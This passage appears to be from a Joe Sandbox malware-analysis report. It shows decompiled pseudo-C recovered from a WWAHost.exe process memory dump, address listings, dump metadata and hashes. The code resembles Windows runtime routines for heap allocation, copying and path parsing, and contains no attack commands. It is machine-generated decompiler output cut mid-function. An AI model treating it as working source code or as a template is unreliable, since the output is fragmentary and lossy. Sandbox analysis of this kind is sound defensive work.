                                              														asm("movsd");
                                              														asm("movsd");
                                              														_t327 = 1;
                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                              														_t479 = 0x68;
                                              														 *(_t528 - 0x78) = _t479;
                                              													}
                                              													__eflags =  *(_t528 - 0x79) - _t327;
                                              													if( *(_t528 - 0x79) == _t327) {
                                              														_t524 = _t479 + _t427;
                                              														_t508 =  *(_t528 - 0x8c);
                                              														 *_t524 = _t508;
                                              														_t373 = 2;
                                              														 *((short*)(_t524 + 2)) = _t373;
                                              														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                              														 *((short*)(_t524 + 4)) = 0;
                                              														_t167 = _t524 + 8; // 0x8
                                              														E0399F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                              														_t529 = _t529 + 0xc;
                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                              														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                              														 *(_t528 - 0x78) = _t479;
                                              														_t380 =  *(_t528 - 0x80);
                                              														__eflags = _t380;
                                              														if(_t380 != 0) {
                                              															_t173 = _t380 + 4;
                                              															 *_t173 =  *(_t380 + 4) | 1;
                                              															__eflags =  *_t173;
                                              														}
                                              														_t454 = _t524;
                                              														 *(_t528 - 0x80) = _t454;
                                              														_t327 = 1;
                                              														__eflags = 1;
                                              													}
                                              													__eflags =  *(_t528 - 0xd4);
                                              													if( *(_t528 - 0xd4) == 0) {
                                              														_t505 =  *(_t528 - 0x80);
                                              													} else {
                                              														_t505 = _t479 + _t427;
                                              														_t523 = 0x10;
                                              														 *_t505 = _t523;
                                              														_t367 = 3;
                                              														 *((short*)(_t505 + 2)) = _t367;
                                              														_t368 = 4;
                                              														 *((short*)(_t505 + 6)) = _t368;
                                              														 *(_t505 + 4) = 0;
                                              														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                              														_t327 = 1;
                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                              														_t479 = _t479 + _t523;
                                              														 *(_t528 - 0x78) = _t479;
                                              														__eflags = _t454;
                                              														if(_t454 != 0) {
                                              															_t186 = _t454 + 4;
                                              															 *_t186 =  *(_t454 + 4) | 1;
                                              															__eflags =  *_t186;
                                              														}
                                              														 *(_t528 - 0x80) = _t505;
                                              													}
                                              													__eflags =  *(_t528 - 0x7a) - _t327;
                                              													if( *(_t528 - 0x7a) == _t327) {
                                              														 *(_t528 - 0xd4) = _t479 + _t427;
                                              														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                              														E0399F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                              														_t529 = _t529 + 0xc;
                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                              														_t479 =  *(_t528 - 0x78) + _t522;
                                              														 *(_t528 - 0x78) = _t479;
                                              														__eflags = _t505;
                                              														if(_t505 != 0) {
                                              															_t199 = _t505 + 4;
                                              															 *_t199 =  *(_t505 + 4) | 1;
                                              															__eflags =  *_t199;
                                              														}
                                              														_t505 =  *(_t528 - 0xd4);
                                              														 *(_t528 - 0x80) = _t505;
                                              													}
                                              													__eflags =  *(_t528 - 0xa8);
                                              													if( *(_t528 - 0xa8) != 0) {
                                              														_t356 = _t479 + _t427;
                                              														 *(_t528 - 0xd4) = _t356;
                                              														_t462 =  *(_t528 - 0xac);
                                              														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                              														_t485 = 0xc;
                                              														 *((short*)(_t356 + 2)) = _t485;
                                              														 *(_t356 + 6) = _t462;
                                              														 *((short*)(_t356 + 4)) = 0;
                                              														_t211 = _t356 + 8; // 0x9
                                              														E0399F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                              														E0399FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                              														_t529 = _t529 + 0x18;
                                              														_t427 =  *(_t528 - 0x88);
                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                              														_t505 =  *(_t528 - 0xd4);
                                              														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                              														 *(_t528 - 0x78) = _t479;
                                              														_t362 =  *(_t528 - 0x80);
                                              														__eflags = _t362;
                                              														if(_t362 != 0) {
                                              															_t222 = _t362 + 4;
                                              															 *_t222 =  *(_t362 + 4) | 1;
                                              															__eflags =  *_t222;
                                              														}
                                              													}
                                              													__eflags =  *(_t528 - 0xb0);
                                              													if( *(_t528 - 0xb0) != 0) {
                                              														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                              														_t458 = 0xb;
                                              														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                              														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                              														 *((short*)(_t427 + 4 + _t479)) = 0;
                                              														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                              														E0399FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                              														_t529 = _t529 + 0xc;
                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                              														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                              														 *(_t528 - 0x78) = _t479;
                                              														__eflags = _t505;
                                              														if(_t505 != 0) {
                                              															_t241 = _t505 + 4;
                                              															 *_t241 =  *(_t505 + 4) | 1;
                                              															__eflags =  *_t241;
                                              														}
                                              													}
                                              													_t328 =  *(_t528 + 0x1c);
                                              													__eflags = _t328;
                                              													if(_t328 == 0) {
                                              														L87:
                                              														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                              														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                              														_t455 =  *(_t528 - 0xdc);
                                              														 *(_t427 + 0x14) = _t455;
                                              														_t480 =  *(_t528 - 0xa0);
                                              														_t517 = 3;
                                              														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                              														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                              															asm("rdtsc");
                                              															 *(_t427 + 0x3c) = _t480;
                                              														} else {
                                              															 *(_t427 + 0x3c) = _t455;
                                              														}
                                              														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                              														_t456 =  *[fs:0x18];
                                              														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                              														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                              														_t427 = 0;
                                              														__eflags = 0;
                                              														_t511 = 0x18;
                                              														goto L91;
                                              													} else {
                                              														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                              														__eflags = _t519;
                                              														 *(_t528 - 0x8c) = _t328;
                                              														do {
                                              															_t506 =  *((intOrPtr*)(_t519 - 4));
                                              															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                              															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                              															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                              															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                              															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                              																_t334 =  *_t519;
                                              															} else {
                                              																_t334 = 0;
                                              															}
                                              															_t336 = _t334 & 0x000000ff;
                                              															__eflags = _t336;
                                              															_t427 =  *(_t528 - 0x88);
                                              															if(_t336 == 0) {
                                              																_t481 = _t479 + _t506;
                                              																__eflags = _t481;
                                              																 *(_t528 - 0x78) = _t481;
                                              																E0399F3E0(_t479 + _t427, _t457, _t506);
                                              																_t529 = _t529 + 0xc;
                                              															} else {
                                              																_t340 = _t336 - 1;
                                              																__eflags = _t340;
                                              																if(_t340 == 0) {
                                              																	E0399F3E0( *(_t528 - 0xb8), _t457, _t506);
                                              																	_t529 = _t529 + 0xc;
                                              																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                              																} else {
                                              																	__eflags = _t340 == 0;
                                              																	if(_t340 == 0) {
                                              																		__eflags = _t506 - 8;
                                              																		if(_t506 == 8) {
                                              																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                              																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                              																		}
                                              																	}
                                              																}
                                              															}
                                              															_t339 = 0x10;
                                              															_t519 = _t519 + _t339;
                                              															_t263 = _t528 - 0x8c;
                                              															 *_t263 =  *(_t528 - 0x8c) - 1;
                                              															__eflags =  *_t263;
                                              															_t479 =  *(_t528 - 0x78);
                                              														} while ( *_t263 != 0);
                                              														goto L87;
                                              													}
                                              												}
                                              											} else {
                                              												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                              												 *(_t528 - 0xa2) = _t392;
                                              												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                              												__eflags = _t469;
                                              												while(1) {
                                              													 *(_t528 - 0xe4) = _t511;
                                              													__eflags = _t392;
                                              													_t393 = _t427;
                                              													if(_t392 != 0) {
                                              														_t393 =  *((intOrPtr*)(_t469 + 4));
                                              													}
                                              													_t395 = (_t393 & 0x000000ff) - _t427;
                                              													__eflags = _t395;
                                              													if(_t395 == 0) {
                                              														_t511 = _t511 +  *_t469;
                                              														__eflags = _t511;
                                              													} else {
                                              														_t398 = _t395 - 1;
                                              														__eflags = _t398;
                                              														if(_t398 == 0) {
                                              															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                              															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                              														} else {
                                              															__eflags = _t398 == 1;
                                              															if(_t398 == 1) {
                                              																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                              																_t402 =  *_t469 & 0x0000ffff;
                                              																 *(_t528 - 0xac) = _t402;
                                              																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                              															}
                                              														}
                                              													}
                                              													__eflags = _t511 -  *(_t528 - 0xe4);
                                              													if(_t511 <  *(_t528 - 0xe4)) {
                                              														break;
                                              													}
                                              													_t397 =  *(_t528 - 0x88) + 1;
                                              													 *(_t528 - 0x88) = _t397;
                                              													_t469 = _t469 + 0x10;
                                              													__eflags = _t397 -  *(_t528 + 0x1c);
                                              													_t392 =  *(_t528 - 0xa2);
                                              													if(_t397 <  *(_t528 + 0x1c)) {
                                              														continue;
                                              													}
                                              													goto L45;
                                              												}
                                              												_t475 = 0x216;
                                              												 *(_t528 - 0x74) = 0x216;
                                              												goto L45;
                                              											}
                                              										} else {
                                              											asm("lock dec dword [eax+ecx*8+0x4]");
                                              											goto L16;
                                              										}
                                              									}
                                              									_t491 = E03A24CAB(_t306, _t528 - 0xa4);
                                              									 *(_t528 - 0x74) = _t491;
                                              									__eflags = _t491;
                                              									if(_t491 != 0) {
                                              										goto L91;
                                              									} else {
                                              										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                              										goto L20;
                                              									}
                                              								}
                                              								L16:
                                              								 *(_t528 - 0x74) = 0x1069;
                                              								L93:
                                              								_t298 =  *(_t528 - 0xd0) + 1;
                                              								 *(_t528 - 0xd0) = _t298;
                                              								_t474 = _t474 + _t511;
                                              								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                              								_t494 = 4;
                                              								__eflags = _t298 - _t494;
                                              								if(_t298 >= _t494) {
                                              									goto L100;
                                              								}
                                              								_t494 =  *(_t528 - 0xcc);
                                              								_t435 = _t298;
                                              								continue;
                                              							}
                                              							__eflags = _t494[2] | _t494[3];
                                              							if((_t494[2] | _t494[3]) == 0) {
                                              								goto L15;
                                              							}
                                              							goto L12;
                                              						}
                                              						__eflags = _t301;
                                              						if(_t301 != 0) {
                                              							goto L92;
                                              						}
                                              						goto L10;
                                              						L92:
                                              						goto L93;
                                              					}
                                              				} else {
                                              					_push(0x57);
                                              					L101:
                                              					return E039AD130(_t427, _t494, _t511);
                                              				}
                                              			}

                                              0x03a26012
                                              0x03a26012
                                              0x03a26018
                                              0x03a26019
                                              0x03a2601a
                                              0x03a2601b
                                              0x03a2601c
                                              0x03a26020
                                              0x03a26059
                                              0x03a2605c
                                              0x03a26061
                                              0x03a26061
                                              0x03a26022
                                              0x03a26022
                                              0x03a26022
                                              0x03a26025
                                              0x03a2602a
                                              0x03a2602b
                                              0x03a26031
                                              0x03a26037
                                              0x03a26038
                                              0x03a2603e
                                              0x03a26048
                                              0x03a26049
                                              0x03a2604a
                                              0x03a2604b
                                              0x03a2604c
                                              0x03a2604d
                                              0x03a26053
                                              0x03a26054
                                              0x03a26054
                                              0x03a26062
                                              0x03a26065
                                              0x03a26067
                                              0x03a2606a
                                              0x03a26070
                                              0x03a26075
                                              0x03a26076
                                              0x03a26081
                                              0x03a26087
                                              0x03a26095
                                              0x03a26099
                                              0x03a2609e
                                              0x03a260a4
                                              0x03a260ae
                                              0x03a260b0
                                              0x03a260b3
                                              0x03a260b6
                                              0x03a260b8
                                              0x03a260ba
                                              0x03a260ba
                                              0x03a260ba
                                              0x03a260ba
                                              0x03a260be
                                              0x03a260c0
                                              0x03a260c5
                                              0x03a260c5
                                              0x03a260c5
                                              0x03a260c6
                                              0x03a260cd
                                              0x03a26114
                                              0x03a260cf
                                              0x03a260cf
                                              0x03a260d4
                                              0x03a260d5
                                              0x03a260da
                                              0x03a260db
                                              0x03a260e1
                                              0x03a260e2
                                              0x03a260e8
                                              0x03a260f8
                                              0x03a260fd
                                              0x03a260fe
                                              0x03a26102
                                              0x03a26104
                                              0x03a26107
                                              0x03a26109
                                              0x03a2610b
                                              0x03a2610b
                                              0x03a2610b
                                              0x03a2610b
                                              0x03a2610f
                                              0x03a2610f
                                              0x03a26117
                                              0x03a2611a
                                              0x03a2611f
                                              0x03a26125
                                              0x03a26134
                                              0x03a26139
                                              0x03a2613f
                                              0x03a26146
                                              0x03a26148
                                              0x03a2614b
                                              0x03a2614d
                                              0x03a2614f
                                              0x03a2614f
                                              0x03a2614f
                                              0x03a2614f
                                              0x03a26153
                                              0x03a26159
                                              0x03a26159
                                              0x03a2615c
                                              0x03a26163
                                              0x03a26169
                                              0x03a2616c
                                              0x03a26172
                                              0x03a26181
                                              0x03a26186
                                              0x03a26187
                                              0x03a2618b
                                              0x03a26191
                                              0x03a26195
                                              0x03a261a3
                                              0x03a261bb
                                              0x03a261c0
                                              0x03a261c3
                                              0x03a261cc
                                              0x03a261d0
                                              0x03a261dc
                                              0x03a261de
                                              0x03a261e1
                                              0x03a261e4
                                              0x03a261e6
                                              0x03a261e8
                                              0x03a261e8
                                              0x03a261e8
                                              0x03a261e8
                                              0x03a261e6
                                              0x03a261ec
                                              0x03a261f3
                                              0x03a26203
                                              0x03a26209
                                              0x03a2620a
                                              0x03a26216
                                              0x03a2621d
                                              0x03a26227
                                              0x03a26241
                                              0x03a26246
                                              0x03a2624c
                                              0x03a26257
                                              0x03a26259
                                              0x03a2625c
                                              0x03a2625e
                                              0x03a26260
                                              0x03a26260
                                              0x03a26260
                                              0x03a26260
                                              0x03a2625e
                                              0x03a26264
                                              0x03a26267
                                              0x03a26269
                                              0x03a26315
                                              0x03a26315
                                              0x03a2631b
                                              0x03a2631e
                                              0x03a26324
                                              0x03a26327
                                              0x03a2632f
                                              0x03a26330
                                              0x03a26333
                                              0x03a2633a
                                              0x03a2633c
                                              0x03a26335
                                              0x03a26335
                                              0x03a26335
                                              0x03a2633f
                                              0x03a26342
                                              0x03a2634c
                                              0x03a26352
                                              0x03a26355
                                              0x03a26355
                                              0x03a26359
                                              0x00000000
                                              0x03a2626f
                                              0x03a26275
                                              0x03a26275
                                              0x03a26278
                                              0x03a2627e
                                              0x03a2627e
                                              0x03a26281
                                              0x03a26287
                                              0x03a2628d
                                              0x03a26298
                                              0x03a2629c
                                              0x03a262a2
                                              0x03a2629e
                                              0x03a2629e
                                              0x03a2629e
                                              0x03a262a7
                                              0x03a262a7
                                              0x03a262aa
                                              0x03a262b0
                                              0x03a262f0
                                              0x03a262f0
                                              0x03a262f2
                                              0x03a262f8
                                              0x03a262fd
                                              0x03a262b2
                                              0x03a262b2
                                              0x03a262b2
                                              0x03a262b5
                                              0x03a262dd
                                              0x03a262e2
                                              0x03a262e5
                                              0x03a262b7
                                              0x03a262b8
                                              0x03a262bb
                                              0x03a262bd
                                              0x03a262c0
                                              0x03a262c4
                                              0x03a262cd
                                              0x03a262cd
                                              0x03a262c0
                                              0x03a262bb
                                              0x03a262b5
                                              0x03a26302
                                              0x03a26303
                                              0x03a26305
                                              0x03a26305
                                              0x03a26305
                                              0x03a2630c
                                              0x03a2630c
                                              0x00000000
                                              0x03a2627e
                                              0x03a26269
                                              0x03a25eac
                                              0x03a25ebb
                                              0x03a25ebe
                                              0x03a25ecb
                                              0x03a25ecb
                                              0x03a25ece
                                              0x03a25ece
                                              0x03a25ed4
                                              0x03a25ed7
                                              0x03a25ed9
                                              0x03a25edb
                                              0x03a25edb
                                              0x03a25ee1
                                              0x03a25ee1
                                              0x03a25ee3
                                              0x03a25f20
                                              0x03a25f20
                                              0x03a25ee5
                                              0x03a25ee5
                                              0x03a25ee5
                                              0x03a25ee8
                                              0x03a25f11
                                              0x03a25f18
                                              0x03a25eea
                                              0x03a25eea
                                              0x03a25eed
                                              0x03a25ef2
                                              0x03a25ef8
                                              0x03a25efb
                                              0x03a25f0a
                                              0x03a25f0a
                                              0x03a25eed
                                              0x03a25ee8
                                              0x03a25f22
                                              0x03a25f28
                                              0x00000000
                                              0x00000000
                                              0x03a25f30
                                              0x03a25f31
                                              0x03a25f37
                                              0x03a25f3a
                                              0x03a25f3d
                                              0x03a25f44
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03a25f46
                                              0x03a25f48
                                              0x03a25f4d
                                              0x00000000
                                              0x03a25f4d
                                              0x03a25dda
                                              0x03a25ddf
                                              0x00000000
                                              0x03a25ddf
                                              0x03a25dd8
                                              0x03a25da7
                                              0x03a25da9
                                              0x03a25dac
                                              0x03a25dae
                                              0x00000000
                                              0x03a25db4
                                              0x03a25db4
                                              0x00000000
                                              0x03a25db4
                                              0x03a25dae
                                              0x03a25d88
                                              0x03a25d8d
                                              0x03a26363
                                              0x03a26369
                                              0x03a2636a
                                              0x03a26370
                                              0x03a26372
                                              0x03a2637a
                                              0x03a2637b
                                              0x03a2637d
                                              0x00000000
                                              0x00000000
                                              0x03a2637f
                                              0x03a26385
                                              0x00000000
                                              0x03a26385
                                              0x03a25d38
                                              0x03a25d3b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03a25d3b
                                              0x03a25d27
                                              0x03a25d29
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03a26360
                                              0x00000000
                                              0x03a26360
                                              0x03a25c10
                                              0x03a25c10
                                              0x03a263da
                                              0x03a263e5
                                              0x03a263e5

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 49be0aaa51efe0e43f785c12bee473c29d8ef872e2bc2621c981e276bea403b3
                                              • Instruction ID: e553f43b659d81f6f823045b3521b50a462b0e491e8f46b30de3e7302e2348b5
                                              • Opcode Fuzzy Hash: 49be0aaa51efe0e43f785c12bee473c29d8ef872e2bc2621c981e276bea403b3
                                              • Instruction Fuzzy Hash: A9422875D012298FDB24CF68C880BA9FBB1FF49304F1881AED949AB252E7759985CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E03974120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                              				signed int _v8;
                                              				void* _v20;
                                              				signed int _v24;
                                              				char _v532;
                                              				char _v540;
                                              				signed short _v544;
                                              				signed int _v548;
                                              				signed short* _v552;
                                              				signed short _v556;
                                              				signed short* _v560;
                                              				signed short* _v564;
                                              				signed short* _v568;
                                              				void* _v570;
                                              				signed short* _v572;
                                              				signed short _v576;
                                              				signed int _v580;
                                              				char _v581;
                                              				void* _v584;
                                              				unsigned int _v588;
                                              				signed short* _v592;
                                              				void* _v597;
                                              				void* _v600;
                                              				void* _v604;
                                              				void* _v609;
                                              				void* _v616;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				unsigned int _t161;
                                              				signed int _t162;
                                              				unsigned int _t163;
                                              				void* _t169;
                                              				signed short _t173;
                                              				signed short _t177;
                                              				signed short _t181;
                                              				unsigned int _t182;
                                              				signed int _t185;
                                              				signed int _t213;
                                              				signed int _t225;
                                              				short _t233;
                                              				signed char _t234;
                                              				signed int _t242;
                                              				signed int _t243;
                                              				signed int _t244;
                                              				signed int _t245;
                                              				signed int _t250;
                                              				void* _t251;
                                              				signed short* _t254;
                                              				void* _t255;
                                              				signed int _t256;
                                              				void* _t257;
                                              				signed short* _t260;
                                              				signed short _t265;
                                              				signed short* _t269;
                                              				signed short _t271;
                                              				signed short** _t272;
                                              				signed short* _t275;
                                              				signed short _t282;
                                              				signed short _t283;
                                              				signed short _t290;
                                              				signed short _t299;
                                              				signed short _t307;
                                              				signed int _t308;
                                              				signed short _t311;
                                              				signed short* _t315;
                                              				signed short _t316;
                                              				void* _t317;
                                              				void* _t319;
                                              				signed short* _t321;
                                              				void* _t322;
                                              				void* _t323;
                                              				unsigned int _t324;
                                              				signed int _t325;
                                              				void* _t326;
                                              				signed int _t327;
                                              				signed int _t329;
                                              
                                              				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                              				_v8 =  *0x3a4d360 ^ _t329;
                                              				_t157 = _a8;
                                              				_t321 = _a4;
                                              				_t315 = __edx;
                                              				_v548 = __ecx;
                                              				_t305 = _a20;
                                              				_v560 = _a12;
                                              				_t260 = _a16;
                                              				_v564 = __edx;
                                              				_v580 = _a8;
                                              				_v572 = _t260;
                                              				_v544 = _a20;
                                              				if( *__edx <= 8) {
                                              					L3:
                                              					if(_t260 != 0) {
                                              						 *_t260 = 0;
                                              					}
                                              					_t254 =  &_v532;
                                              					_v588 = 0x208;
                                              					if((_v548 & 0x00000001) != 0) {
                                              						_v556 =  *_t315;
                                              						_v552 = _t315[2];
                                              						_t161 = E0398F232( &_v556);
                                              						_t316 = _v556;
                                              						_v540 = _t161;
                                              						goto L17;
                                              					} else {
                                              						_t306 = 0x208;
                                              						_t298 = _t315;
                                              						_t316 = E03976E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                              						if(_t316 == 0) {
                                              							L68:
                                              							_t322 = 0xc0000033;
                                              							goto L39;
                                              						} else {
                                              							while(_v581 == 0) {
                                              								_t233 = _v588;
                                              								if(_t316 > _t233) {
                                              									_t234 = _v548;
                                              									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                              										_t254 = L03974620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                              										if(_t254 == 0) {
                                              											_t169 = 0xc0000017;
                                              										} else {
                                              											_t298 = _v564;
                                              											_v588 = _t316;
                                              											_t306 = _t316;
                                              											_t316 = E03976E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                              											if(_t316 != 0) {
                                              												continue;
                                              											} else {
                                              												goto L68;
                                              											}
                                              										}
                                              									} else {
                                              										goto L90;
                                              									}
                                              								} else {
                                              									_v556 = _t316;
                                              									 *((short*)(_t329 + 0x32)) = _t233;
                                              									_v552 = _t254;
                                              									if(_t316 < 2) {
                                              										L11:
                                              										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                              											_t161 = 5;
                                              										} else {
                                              											if(_t316 < 6) {
                                              												L87:
                                              												_t161 = 3;
                                              											} else {
                                              												_t242 = _t254[2] & 0x0000ffff;
                                              												if(_t242 != 0x5c) {
                                              													if(_t242 == 0x2f) {
                                              														goto L16;
                                              													} else {
                                              														goto L87;
                                              													}
                                              													goto L101;
                                              												} else {
                                              													L16:
                                              													_t161 = 2;
                                              												}
                                              											}
                                              										}
                                              									} else {
                                              										_t243 =  *_t254 & 0x0000ffff;
                                              										if(_t243 == 0x5c || _t243 == 0x2f) {
                                              											if(_t316 < 4) {
                                              												L81:
                                              												_t161 = 4;
                                              												goto L17;
                                              											} else {
                                              												_t244 = _t254[1] & 0x0000ffff;
                                              												if(_t244 != 0x5c) {
                                              													if(_t244 == 0x2f) {
                                              														goto L60;
                                              													} else {
                                              														goto L81;
                                              													}
                                              												} else {
                                              													L60:
                                              													if(_t316 < 6) {
                                              														L83:
                                              														_t161 = 1;
                                              														goto L17;
                                              													} else {
                                              														_t245 = _t254[2] & 0x0000ffff;
                                              														if(_t245 != 0x2e) {
                                              															if(_t245 == 0x3f) {
                                              																goto L62;
                                              															} else {
                                              																goto L83;
                                              															}
                                              														} else {
                                              															L62:
                                              															if(_t316 < 8) {
                                              																L85:
                                              																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                              																goto L17;
                                              															} else {
                                              																_t250 = _t254[3] & 0x0000ffff;
                                              																if(_t250 != 0x5c) {
                                              																	if(_t250 == 0x2f) {
                                              																		goto L64;
                                              																	} else {
                                              																		goto L85;
                                              																	}
                                              																} else {
                                              																	L64:
                                              																	_t161 = 6;
                                              																	goto L17;
                                              																}
                                              															}
                                              														}
                                              													}
                                              												}
                                              											}
                                              											goto L101;
                                              										} else {
                                              											goto L11;
                                              										}
                                              									}
                                              									L17:
                                              									if(_t161 != 2) {
                                              										_t162 = _t161 - 1;
                                              										if(_t162 > 5) {
                                              											goto L18;
                                              										} else {
                                              											switch( *((intOrPtr*)(_t162 * 4 +  &M039745F8))) {
                                              												case 0:
                                              													_v568 = 0x3931078;
                                              													__eax = 2;
                                              													goto L20;
                                              												case 1:
                                              													goto L18;
                                              												case 2:
                                              													_t163 = 4;
                                              													goto L19;
                                              											}
                                              										}
                                              										goto L41;
                                              									} else {
                                              										L18:
                                              										_t163 = 0;
                                              										L19:
                                              										_v568 = 0x39311c4;
                                              									}
                                              									L20:
                                              									_v588 = _t163;
                                              									_v564 = _t163 + _t163;
                                              									_t306 =  *_v568 & 0x0000ffff;
                                              									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                              									_v576 = _t265;
                                              									if(_t265 > 0xfffe) {
                                              										L90:
                                              										_t322 = 0xc0000106;
                                              									} else {
                                              										if(_t321 != 0) {
                                              											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                              												if(_v580 != 0) {
                                              													goto L23;
                                              												} else {
                                              													_t322 = 0xc0000106;
                                              													goto L39;
                                              												}
                                              											} else {
                                              												_t177 = _t306;
                                              												goto L25;
                                              											}
                                              											goto L101;
                                              										} else {
                                              											if(_v580 == _t321) {
                                              												_t322 = 0xc000000d;
                                              											} else {
                                              												L23:
                                              												_t173 = L03974620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                              												_t269 = _v592;
                                              												_t269[2] = _t173;
                                              												if(_t173 == 0) {
                                              													_t322 = 0xc0000017;
                                              												} else {
                                              													_t316 = _v556;
                                              													 *_t269 = 0;
                                              													_t321 = _t269;
                                              													_t269[1] = _v576;
                                              													_t177 =  *_v568 & 0x0000ffff;
                                              													L25:
                                              													_v580 = _t177;
                                              													if(_t177 == 0) {
                                              														L29:
                                              														_t307 =  *_t321 & 0x0000ffff;
                                              													} else {
                                              														_t290 =  *_t321 & 0x0000ffff;
                                              														_v576 = _t290;
                                              														_t310 = _t177 & 0x0000ffff;
                                              														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                              															_t307 =  *_t321 & 0xffff;
                                              														} else {
                                              															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                              															E0399F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                              															_t329 = _t329 + 0xc;
                                              															_t311 = _v580;
                                              															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                              															 *_t321 = _t225;
                                              															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                              																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                              															}
                                              															goto L29;
                                              														}
                                              													}
                                              													_t271 = _v556 - _v588 + _v588;
                                              													_v580 = _t307;
                                              													_v576 = _t271;
                                              													if(_t271 != 0) {
                                              														_t308 = _t271 & 0x0000ffff;
                                              														_v588 = _t308;
                                              														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                              															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                              															E0399F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                              															_t329 = _t329 + 0xc;
                                              															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                              															 *_t321 = _t213;
                                              															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                              																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                              															}
                                              														}
                                              													}
                                              													_t272 = _v560;
                                              													if(_t272 != 0) {
                                              														 *_t272 = _t321;
